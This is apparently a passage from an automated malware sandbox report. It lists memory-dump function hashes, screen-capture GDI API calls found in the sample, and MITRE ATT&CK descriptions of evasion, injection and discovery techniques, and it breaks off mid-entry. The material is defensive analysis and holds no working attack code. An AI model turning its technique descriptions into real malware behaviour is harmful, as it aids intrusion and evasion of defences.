Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738999c0bce6da6293169b6c7637f6d1774d2f6cab298c801f560bbffcc0e0ae
Instruction ID: e76ed167a010f2be7e63c290ca34c0fb0815bf5c54f411b7a248742e8bec569f
Opcode Fuzzy Hash: 738999c0bce6da6293169b6c7637f6d1774d2f6cab298c801f560bbffcc0e0ae
Instruction Fuzzy Hash: 65E0CD753C99404BCB1DDF1498605707363E74B7143E9645DD4D6D7741DD1AC8438B25

Function 007A10B7 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f52a18d440bf9be367b2ccef543bea55f8c477eaf72c52b0002209f320ddfea7
Instruction ID: 0b49ec06395a64ff6c414896b891d2f7fc200d0d6e37775781d04eef8d9fae8e
Opcode Fuzzy Hash: f52a18d440bf9be367b2ccef543bea55f8c477eaf72c52b0002209f320ddfea7
Instruction Fuzzy Hash: 54C08C342590809BD208DB19CC98E27377EEBC7688B90C43DE88A07756C620688AC6AC

Function 00799959 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b627457cd643c20175c187fd4dd81491ac7beb7f1f106894e9da90ac8caa5272
Instruction ID: cf182f9550700a101b6f15f3a45238f6038e29ba390ad6308b4e6c415b822364
Opcode Fuzzy Hash: b627457cd643c20175c187fd4dd81491ac7beb7f1f106894e9da90ac8caa5272
Instruction Fuzzy Hash: A8E02611A540824BDB0DCF3E98A023052AB97C3314728E03C82C3C32A9DD2ACE049208

Function 00785C69 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15917ab2b7b438754a8da4f51ef5eada926d8bd58fe40611778282661ca507da
Instruction ID: e9ad8ab97ce6b8de447acdee153cd49b4416702bfe81bbb61a8c6bcc12af535b
Opcode Fuzzy Hash: 15917ab2b7b438754a8da4f51ef5eada926d8bd58fe40611778282661ca507da
Instruction Fuzzy Hash: 4BD0A761FB0500AFD918AA209C43C29B93B6FC721174A6424E80713706D637C4168A95

Function 007A14C7 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe1b8804362bc59ed52b11932140bd72d7e5e3b5549690a92cdc06c7ec81d5d
Instruction ID: 318400af1a2d96f3404ee6291c4e130d79b5c152e3aa4394e4f4a02933d24779
Opcode Fuzzy Hash: 0fe1b8804362bc59ed52b11932140bd72d7e5e3b5549690a92cdc06c7ec81d5d
Instruction Fuzzy Hash: DAD02BB42212408BC30CCB19DCA0D1B3BFAEFC9784F05C52CA44603208C1309800CB15

Function 00461260 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe1b8804362bc59ed52b11932140bd72d7e5e3b5549690a92cdc06c7ec81d5d
Instruction ID: 318400af1a2d96f3404ee6291c4e130d79b5c152e3aa4394e4f4a02933d24779
Opcode Fuzzy Hash: 0fe1b8804362bc59ed52b11932140bd72d7e5e3b5549690a92cdc06c7ec81d5d
Instruction Fuzzy Hash: DAD02BB42212408BC30CCB19DCA0D1B3BFAEFC9784F05C52CA44603208C1309800CB15

Function 00787BC9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e0c40da945c309aa9c98e9b15d8b20ad8652b6182ffac96a0e256a4d5820819
Instruction ID: a7f42dc449abd4449490f8af300561d98c180f69766ac6f9d094a732ab35e528
Opcode Fuzzy Hash: 8e0c40da945c309aa9c98e9b15d8b20ad8652b6182ffac96a0e256a4d5820819
Instruction Fuzzy Hash: 43D0A934A484009BCA04CFA0DC01AB473B1BB8A300F44603AF40AEB610C92AA4808B08

Function 0076A3F7 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b47eed451238b1de731c3406ca0266ce4f4cf8b38ca3412f331e05f7599b319e
Instruction ID: 73519757d37a75527c7340963a2c759a23f2c1146d8a2dc57f5b59639d0bd162
Opcode Fuzzy Hash: b47eed451238b1de731c3406ca0266ce4f4cf8b38ca3412f331e05f7599b319e
Instruction Fuzzy Hash: 35D01274F14A008BC304CF19E8D1431F3F5A74E2007116529C197D3725D630F8028B09

Function 0076A3E9 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9b16d60059b3cb7e8699d114cad70d5a6bab84cc142402d874ccc940dcac8c
Instruction ID: 9e719a52a299510b2ef47aedce645a70b8be8a29a14e45bbc2da99feb3793654
Opcode Fuzzy Hash: ea9b16d60059b3cb7e8699d114cad70d5a6bab84cc142402d874ccc940dcac8c
Instruction Fuzzy Hash: 90C08C34F680408B8308CA2EAC51030A2B6A38B6017297039C047E3328E920E8024B0E

Function 0076A999 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e00188deb0d419d26b65f884ff921f4e6c9d5d41bb67290f0062172a347aa94
Instruction ID: 73dff7c34f3a34dd1632ce5eb2466206d5e63da748e40220351e1e4d6f064ced
Opcode Fuzzy Hash: 8e00188deb0d419d26b65f884ff921f4e6c9d5d41bb67290f0062172a347aa94
Instruction Fuzzy Hash: 72C04C35F4404087CA099F54F8A1675A26367C730CF14743AD247E3291D998DC46860E

Function 0042A182 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9b16d60059b3cb7e8699d114cad70d5a6bab84cc142402d874ccc940dcac8c
Instruction ID: b18af93adae99b8ddff4992f27aa7dd88465b30ccd8e3952a44961fb0d8be648
Opcode Fuzzy Hash: ea9b16d60059b3cb7e8699d114cad70d5a6bab84cc142402d874ccc940dcac8c
Instruction Fuzzy Hash: E0C08C38F28040CB8308CA29AC51470A2B66B8A605B55743AC046D3318E920E822870F

Function 0042A190 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b47eed451238b1de731c3406ca0266ce4f4cf8b38ca3412f331e05f7599b319e
Instruction ID: 73519757d37a75527c7340963a2c759a23f2c1146d8a2dc57f5b59639d0bd162
Opcode Fuzzy Hash: b47eed451238b1de731c3406ca0266ce4f4cf8b38ca3412f331e05f7599b319e
Instruction Fuzzy Hash: 35D01274F14A008BC304CF19E8D1431F3F5A74E2007116529C197D3725D630F8028B09

Function 00787B24 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af71aa022ba6ca6787cffe3f8c59596ef3fcb526651ea09f8b0fa992b0510fd7
Instruction ID: 2e57a8b3c8e46d971908e47428d6415397ebd3b1914d820ecd0d93e35ddf7b14
Opcode Fuzzy Hash: af71aa022ba6ca6787cffe3f8c59596ef3fcb526651ea09f8b0fa992b0510fd7
Instruction Fuzzy Hash: 6AC09B3479C5409FC74CCF60D8D54756676A38F214774703A560FEBB54C59CD442CA0C

Function 0076BA69 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1959b02ed270f89d9e2ba191a78b70ca468794c0bd7609855451eaf8261cb17
Instruction ID: f8a78af0535e90d94d6ae1e13165e462de9edad98749da714bab284503a785c0
Opcode Fuzzy Hash: b1959b02ed270f89d9e2ba191a78b70ca468794c0bd7609855451eaf8261cb17
Instruction Fuzzy Hash: D0C04C25F58040878549DB149855474A365DB5620AB183028D546E3291DE99D915D60F

Function 00778A27 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8be222cb0f5e2a3223f67fd19781438d3b22f179b288c5d90d22d42ed9a1fb
Instruction ID: 69772b45ea420a7942f6167fbf0ce4d2cdca563379b3763a14f3d784d152d147
Opcode Fuzzy Hash: 8d8be222cb0f5e2a3223f67fd19781438d3b22f179b288c5d90d22d42ed9a1fb
Instruction Fuzzy Hash: 19C04C346446408BD254CF05DE91633B3B6E78B319F14A565C15AE32A6C6F0E49296CC

Function 00778A22 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321cc0fb7521b5dc8e0323726b334416f2df4c353fc71423e32240a4eccb5096
Instruction ID: de17fb8987d77d13a4d4bb28dc540f55f7722cbb70174843b3712e2d78f5440a
Opcode Fuzzy Hash: 321cc0fb7521b5dc8e0323726b334416f2df4c353fc71423e32240a4eccb5096
Instruction Fuzzy Hash: E0C08C346445008BC290CF04EE40433B3B6E78B209B20E110C01EF3226C6F0E482A68C

Function 00461070 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29a8d48b51beb8ffd87835ccac39e6197363daf119beaf0fa2fa243dc676115
Instruction ID: 018100df58388e17a3b21b8a426205982faad085d35efa3043b8260c98de54bb
Opcode Fuzzy Hash: d29a8d48b51beb8ffd87835ccac39e6197363daf119beaf0fa2fa243dc676115
Instruction Fuzzy Hash: E8D02232B122628BC748CB18CCD065B33A3AFC9320B19C828884313318C2347C14C780

Function 00785B3E Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be93ea63a1acf49cb7a6f4737f7b8eabcc49b2d7f46d8b313cdc7d9eaba28b57
Instruction ID: b0a50faca5ffb734fb5c1b5f3b35b0e04606df49abf90a36f0f0c01babb96f27
Opcode Fuzzy Hash: be93ea63a1acf49cb7a6f4737f7b8eabcc49b2d7f46d8b313cdc7d9eaba28b57
Instruction Fuzzy Hash: 7CC0923CB98700C7D608CF00EA528B5A2BBA38B200B26B038C80AE3B50D564E8428B1C

Function 00787BAE Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42b4f0a5324607304d340608b21d699c5ed8f5d68377c96f06a61ae51aa62b0
Instruction ID: 3eb1e634b2b722cbbe93f0017429f98c97382d980b0a5c2d3d987465fcf13ca2
Opcode Fuzzy Hash: c42b4f0a5324607304d340608b21d699c5ed8f5d68377c96f06a61ae51aa62b0
Instruction Fuzzy Hash: DBC09238B8C000DBC648CF05E892475E27A938B224B587439850BE3B60C524E882892C

Function 0076AD75 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c2e07f027425b6e31a9d0ff8ea62e11a3f2e5c237878275b47d1108506ac3f
Instruction ID: c83386f6e518511fb85dd40926cb0f2f853d50f8e549cc428d69b81eb95b62be
Opcode Fuzzy Hash: 49c2e07f027425b6e31a9d0ff8ea62e11a3f2e5c237878275b47d1108506ac3f
Instruction Fuzzy Hash: F8C09239F5C040C7C249CF14E851431A3B8DB0B30AF143038D547E3261EA59EC54DA0F

Function 007673A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37bdab85a3c9b2e96e13e71d28203b459b1ea84de3b064cba1692ad655376b0
Instruction ID: b7d6b93d1480d75072261be3d8ac327afacef0d21690a564a9ddc1261f66901b
Opcode Fuzzy Hash: f37bdab85a3c9b2e96e13e71d28203b459b1ea84de3b064cba1692ad655376b0
Instruction Fuzzy Hash: 35B09235B58380878208CF18EC52632A338E317209B103028D902E3361D690D4C08A4D

Function 0076D8A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5234887885e0e5e4f17f19588babe31a4d22c1ecc9a9e05536fbf31f76a4eacd
Instruction ID: 50d2b94b472d98f9e38da71f51ea2972d241edc879c5a37f4f65ed71f0775f5f
Opcode Fuzzy Hash: 5234887885e0e5e4f17f19588babe31a4d22c1ecc9a9e05536fbf31f76a4eacd
Instruction Fuzzy Hash: B7B0923AA6808087C208CF04FCA3430A2BAA35F604B103038C482E32A1D5A8E410CE0E

Function 00785A73 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93cbdfebb9251d1bb785ca6f385a6fc95863d114dc4907793e8a7d778406664
Instruction ID: 897f90d783d44dc5155cd222bb3dbc41c475d984d9d9d0dd11657848ebc852ff
Opcode Fuzzy Hash: a93cbdfebb9251d1bb785ca6f385a6fc95863d114dc4907793e8a7d778406664
Instruction Fuzzy Hash: 98B01224B980004B870C8D00A851575913B53C7114F15B039841BF3780C834D447841C

Function 00427139 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37bdab85a3c9b2e96e13e71d28203b459b1ea84de3b064cba1692ad655376b0
Instruction ID: b7d6b93d1480d75072261be3d8ac327afacef0d21690a564a9ddc1261f66901b
Opcode Fuzzy Hash: f37bdab85a3c9b2e96e13e71d28203b459b1ea84de3b064cba1692ad655376b0
Instruction Fuzzy Hash: 35B09235B58380878208CF18EC52632A338E317209B103028D902E3361D690D4C08A4D

Function 00795A19 Relevance: 10.6, APIs: 7, Instructions: 51windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,?,?), ref: 00795A26
SelectObject.GDI32(?,00000000), ref: 00795A37
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00795A5D
SelectObject.GDI32(?,?), ref: 00795A67
DeleteDC.GDI32(?), ref: 00795A6F
ReleaseDC.USER32(00000000,?), ref: 00795A79
DeleteObject.GDI32(?), ref: 00795A81

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect$BitmapCompatibleCreateRelease
String ID:
API String ID: 410507473-0
Opcode ID: 35882ac09d2eb837dced4ec75d67a8307b0be5a203b669dbcbf785a675042d06
Instruction ID: 60b1a2d40e870fe434c271fcbe5881f5d466a9dc57f5b5ef8003f11952f1bab9
Opcode Fuzzy Hash: 35882ac09d2eb837dced4ec75d67a8307b0be5a203b669dbcbf785a675042d06
Instruction Fuzzy Hash: 2E11BF79A00245EFDB119F94DC84B99BBB2FF49301F214064FA01A7374D7B268A1DF1A

Function 00794F29 Relevance: 10.5, APIs: 7, Instructions: 48windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,?,?), ref: 00794F36
SelectObject.GDI32(?,00000000), ref: 00794F47
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00794F6D
SelectObject.GDI32(?,?), ref: 00794F77
DeleteDC.GDI32(?), ref: 00794F7F
ReleaseDC.USER32(00000000,?), ref: 00794F89
DeleteObject.GDI32(?), ref: 00794F91

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect$BitmapCompatibleCreateRelease
String ID:
API String ID: 410507473-0
Opcode ID: 7c908d53f1e9f14f7478a20edab9476780021623ee76fcfdd0a3dbd5c4689b77
Instruction ID: d07fd358d1b2dd325522c1c107af2fc9b27c1167fea6b77bb44112cbd7a58b95
Opcode Fuzzy Hash: 7c908d53f1e9f14f7478a20edab9476780021623ee76fcfdd0a3dbd5c4689b77
Instruction Fuzzy Hash: A711B075640205EFDB119FA4DC84B58BBB2FF49301F214464FA41A6274D7B268A0EF1A

Function 00795BBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00795BF7
CreateCompatibleDC.GDI32(00000000), ref: 00795C00

Strings

6x;, xrefs: 00795C2D

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: CompatibleCreate
String ID: 6x;
API String ID: 3111197059-387923016
Opcode ID: 16dc219de5ab8fecaa9e14ab9e9c2b7815e257bbda5dc4f5d44e2fd89f30d6af
Instruction ID: 45c98ea355f928e5e8fef81c7106e3bd22f64809a81dee10c06b0d0d2c87f6f0
Opcode Fuzzy Hash: 16dc219de5ab8fecaa9e14ab9e9c2b7815e257bbda5dc4f5d44e2fd89f30d6af
Instruction Fuzzy Hash: 8111A7B4D00215AFCB50CFA9D982A9DBFF9FB4E350B104429F508E7350D77249518FA6

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
